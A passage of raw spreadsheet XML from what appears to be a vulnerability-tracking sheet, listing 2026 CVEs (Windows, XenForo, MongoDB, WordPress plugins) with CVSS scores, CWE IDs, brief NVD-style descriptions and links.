          <t>CWE-416</t>
        </is>
      </c>
      <c r="S861" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69757</t>
        </is>
      </c>
    </row>
    <row r="862">
      <c r="A862" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B862" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69761</t>
        </is>
      </c>
      <c r="D862" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E862" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F862" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G862" s="5" t="inlineStr"/>
      <c r="H862" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I862" s="5" t="inlineStr"/>
      <c r="J862" s="5" t="inlineStr"/>
      <c r="K862" s="5" t="inlineStr"/>
      <c r="L862" s="5" t="inlineStr"/>
      <c r="M862" s="5" t="inlineStr"/>
      <c r="N862" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O862" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P862" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q862" s="5" t="inlineStr"/>
      <c r="R862" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S862" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69761</t>
        </is>
      </c>
    </row>
    <row r="863">
      <c r="A863" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B863" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69775</t>
        </is>
      </c>
      <c r="D863" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E863" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F863" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G863" s="5" t="inlineStr"/>
      <c r="H863" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I863" s="5" t="inlineStr"/>
      <c r="J863" s="5" t="inlineStr"/>
      <c r="K863" s="5" t="inlineStr"/>
      <c r="L863" s="5" t="inlineStr"/>
      <c r="M863" s="5" t="inlineStr"/>
      <c r="N863" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O863" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P863" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q863" s="5" t="inlineStr"/>
      <c r="R863" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S863" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69775</t>
        </is>
      </c>
    </row>
    <row r="864">
      <c r="A864" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B864" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73321</t>
        </is>
      </c>
      <c r="D864" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E864" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F864" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G864" s="5" t="inlineStr"/>
      <c r="H864" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I864" s="5" t="inlineStr"/>
      <c r="J864" s="5" t="inlineStr"/>
      <c r="K864" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L864" s="5" t="inlineStr"/>
      <c r="M864" s="5" t="inlineStr"/>
      <c r="N864" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O864" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P864" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q864" s="5" t="inlineStr"/>
      <c r="R864" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S864" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an uncontrolled recursion vulnerability in the BBCode parser that allows authenticated attackers to cause persistent denial of service by submitting a post with deeply nested BBCode tags. Attackers can craft a single malicious post with sufficient nesting depth to exceed PHP's stack limit, causing fatal errors that repeatedly terminate PHP-FPM workers for all visitors rendering the affected thread.</t>
        </is>
      </c>
      <c r="T864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73321</t>
        </is>
      </c>
    </row>
    <row r="865">
      <c r="A865" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B865" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81781</t>
        </is>
      </c>
      <c r="D865" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E865" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F865" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G865" s="5" t="inlineStr"/>
      <c r="H865" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I865" s="5" t="inlineStr"/>
      <c r="J865" s="5" t="inlineStr"/>
      <c r="K865" s="5" t="inlineStr"/>
      <c r="L865" s="5" t="inlineStr"/>
      <c r="M865" s="5" t="inlineStr"/>
      <c r="N865" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O865" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P865" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q865" s="5" t="inlineStr"/>
      <c r="R865" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S865" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Unbounce Unbounce Landing Pages unbounce allows Exploiting Incorrectly Configured Access Control Security Levels.
This issue affects Unbounce Landing Pages: from n/a through 1.1.4.</t>
        </is>
      </c>
      <c r="T865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81781</t>
        </is>
      </c>
    </row>
    <row r="866">
      <c r="A866" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B866" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81798</t>
        </is>
      </c>
      <c r="D866" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E866" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F866" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G866" s="5" t="inlineStr"/>
      <c r="H866" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I866" s="5" t="inlineStr"/>
      <c r="J866" s="5" t="inlineStr"/>
      <c r="K866" s="5" t="inlineStr"/>
      <c r="L866" s="5" t="inlineStr"/>
      <c r="M866" s="5" t="inlineStr"/>
      <c r="N866" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O866" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P866" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q866" s="5" t="inlineStr"/>
      <c r="R866" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S866" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Easy Appointments allows DOM-Based XSS.
This issue affects Easy Appointments: from n/a through 4.0.2.1.</t>
        </is>
      </c>
      <c r="T866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81798</t>
        </is>
      </c>
    </row>
    <row r="867">
      <c r="A867" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B867" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82052</t>
        </is>
      </c>
      <c r="D867" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E867" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F867" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G867" s="5" t="inlineStr"/>
      <c r="H867" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I867" s="5" t="inlineStr"/>
      <c r="J867" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K867" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L867" s="5" t="inlineStr"/>
      <c r="M867" s="5" t="inlineStr"/>
      <c r="N867" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O867" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P867" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q867" s="5" t="inlineStr"/>
      <c r="R867" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S867" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82052</t>
        </is>
      </c>
    </row>
    <row r="868">
      <c r="A868" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B868" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82054</t>
        </is>
      </c>
      <c r="D868" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E868" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F868" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G868" s="5" t="inlineStr"/>
      <c r="H868" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I868" s="5" t="inlineStr"/>
      <c r="J868" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K868" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L868" s="5" t="inlineStr"/>
      <c r="M868" s="5" t="inlineStr"/>
      <c r="N868" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O868" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P868" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q868" s="5" t="inlineStr"/>
      <c r="R868" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S868" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82054</t>
        </is>
      </c>
    </row>
    <row r="869">
      <c r="A869" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B869" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82055</t>
        </is>
      </c>
      <c r="D869" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E869" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F869" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G869" s="5" t="inlineStr"/>
      <c r="H869" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I869" s="5" t="inlineStr"/>
      <c r="J869" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K869" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L869" s="5" t="inlineStr"/>
      <c r="M869" s="5" t="inlineStr"/>
      <c r="N869" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O869" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P869" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q869" s="5" t="inlineStr"/>
      <c r="R869" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S869" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82055</t>
        </is>
      </c>
    </row>
    <row r="870">
      <c r="A870" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B870" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82057</t>
        </is>
      </c>
      <c r="D870" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E870" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F870" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G870" s="5" t="inlineStr"/>
      <c r="H870" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I870" s="5" t="inlineStr"/>
      <c r="J870" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K870" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L870" s="5" t="inlineStr"/>
      <c r="M870" s="5" t="inlineStr"/>
      <c r="N870" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O870" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P870" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q870" s="5" t="inlineStr"/>
      <c r="R870" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S870" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82057</t>
        </is>
      </c>
    </row>
    <row r="871">
      <c r="A871" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B871" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82058</t>
        </is>
      </c>
      <c r="D871" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E871" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F871" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G871" s="5" t="inlineStr"/>
      <c r="H871" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I871" s="5" t="inlineStr"/>
      <c r="J871" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K871" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L871" s="5" t="inlineStr"/>
      <c r="M871" s="5" t="inlineStr"/>
      <c r="N871" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O871" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P871" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q871" s="5" t="inlineStr"/>
      <c r="R871" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S871" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82058</t>
        </is>
      </c>
    </row>
    <row r="872">
      <c r="A872" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B872" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82065</t>
        </is>
      </c>
      <c r="D872" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E872" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F872" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G872" s="5" t="inlineStr"/>
      <c r="H872" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I872" s="5" t="inlineStr"/>
      <c r="J872" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K872" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L872" s="5" t="inlineStr"/>
      <c r="M872" s="5" t="inlineStr"/>
      <c r="N872" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O872" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P872" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q872" s="5" t="inlineStr"/>
      <c r="R872" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S872" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82065</t>
        </is>
      </c>
    </row>
    <row r="873">
      <c r="A873" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B873" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82068</t>
        </is>
      </c>
      <c r="D873" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E873" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F873" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G873" s="5" t="inlineStr"/>
      <c r="H873" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I873" s="5" t="inlineStr"/>
      <c r="J873" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K873" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L873" s="5" t="inlineStr"/>
      <c r="M873" s="5" t="inlineStr"/>
      <c r="N873" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O873" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P873" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q873" s="5" t="inlineStr"/>
      <c r="R873" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S873" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82068</t>
        </is>
      </c>
    </row>
    <row r="874">
      <c r="A874" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B874" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82070</t>
        </is>
      </c>
      <c r="D874" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E874" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F874" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G874" s="5" t="inlineStr"/>
      <c r="H874" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I874" s="5" t="inlineStr"/>
      <c r="J874" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K874" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L874" s="5" t="inlineStr"/>
      <c r="M874" s="5" t="inlineStr"/>
      <c r="N874" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O874" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P874" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q874" s="5" t="inlineStr"/>
      <c r="R874" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S874" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82070</t>
        </is>
      </c>
    </row>
    <row r="875">
      <c r="A875" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B875" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82073</t>
        </is>
      </c>
      <c r="D875" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E875" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F875" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G875" s="5" t="inlineStr"/>
      <c r="H875" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I875" s="5" t="inlineStr"/>
      <c r="J875" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K875" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L875" s="5" t="inlineStr"/>
      <c r="M875" s="5" t="inlineStr"/>
      <c r="N875" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O875" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P875" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q875" s="5" t="inlineStr"/>
      <c r="R875" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S875" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82073</t>
        </is>
      </c>
    </row>
    <row r="876">
      <c r="A876" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B876" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82074</t>
        </is>
      </c>
      <c r="D876" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E876" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F876" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G876" s="5" t="inlineStr"/>
      <c r="H876" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I876" s="5" t="inlineStr"/>
      <c r="J876" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K876" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L876" s="5" t="inlineStr"/>
      <c r="M876" s="5" t="inlineStr"/>
      <c r="N876" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O876" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P876" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q876" s="5" t="inlineStr"/>
      <c r="R876" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S876" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82074</t>
        </is>
      </c>
    </row>
    <row r="877">
      <c r="A877" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B877" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82076</t>
        </is>
      </c>
      <c r="D877" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E877" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F877" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G877" s="5" t="inlineStr"/>
      <c r="H877" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I877" s="5" t="inlineStr"/>
      <c r="J877" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K877" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L877" s="5" t="inlineStr"/>
      <c r="M877" s="5" t="inlineStr"/>
      <c r="N877" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O877" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P877" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q877" s="5" t="inlineStr"/>
      <c r="R877" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S877" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82076</t>
        </is>
      </c>
    </row>
    <row r="878">
      <c r="A878" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B878" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C878" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84817</t>
        </is>
      </c>
      <c r="D878" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E878" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F878" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G878" s="5" t="inlineStr"/>
      <c r="H878" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I878" s="5" t="inlineStr"/>
      <c r="J878" s="5" t="inlineStr"/>
      <c r="K878" s="5" t="inlineStr"/>
      <c r="L878" s="5" t="inlineStr"/>
      <c r="M878" s="5" t="inlineStr"/>
      <c r="N878" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O878" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P878" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q878" s="5" t="inlineStr"/>
      <c r="R878" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S878" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in JetFormBuilder &lt;= 3.6.5.1 versions.</t>
        </is>
      </c>
      <c r="T878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84817</t>
        </is>
      </c>
    </row>
    <row r="879">
      <c r="A879" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B879" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C879" s="5" t="inlineStr">
        <is>
